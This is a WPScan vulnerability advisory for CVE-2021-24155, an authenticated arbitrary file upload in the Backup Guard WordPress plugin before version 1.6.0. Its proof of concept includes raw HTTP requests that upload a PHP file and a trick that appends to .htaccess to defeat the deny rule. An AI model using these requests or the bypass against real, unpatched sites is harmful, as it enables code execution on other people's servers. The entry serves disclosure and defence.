WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload

Description

The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue:

There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however:
- Some web servers do not support .htaccess, e.g Nginx, making it useless in such case
- Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache


Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE

Proof of Concept

Video of the issue on a Nginx Web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing

Additional Info (WPScanTeam):

As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and Import a PHP file, which will then be located at /wp-content/uploads/backup-guard/<filename.php>

If the web server supports .htaccess, just import a .htaccess with b as content, which will be appended to the existing .htaccess, making the deny from all become deny from allb and be invalid without raising any error

Raw requests:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 229
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename="info.php"
Content-Type: text/php

<?=phpinfo();?>
-----------------------------130490272991349650929022108--


If .htaccess supported by the webserver, the following request will remove the protection by appending a b to the existing deny from all line:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 216
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename=".htaccess"
Content-Type: text/php

b
-----------------------------130490272991349650929022108--
 

Affects Plugins

backup
Fixed in version 1.6.0

References

CVE
CVE-2021-24155

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
d442acac-4394-45e4-b6bb-adf4a40960fb

Timeline

Publicly Published

2021-02-18 (about 1 years ago)

Added

2021-02-18 (about 1 years ago)

Last Updated

2021-02-20 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us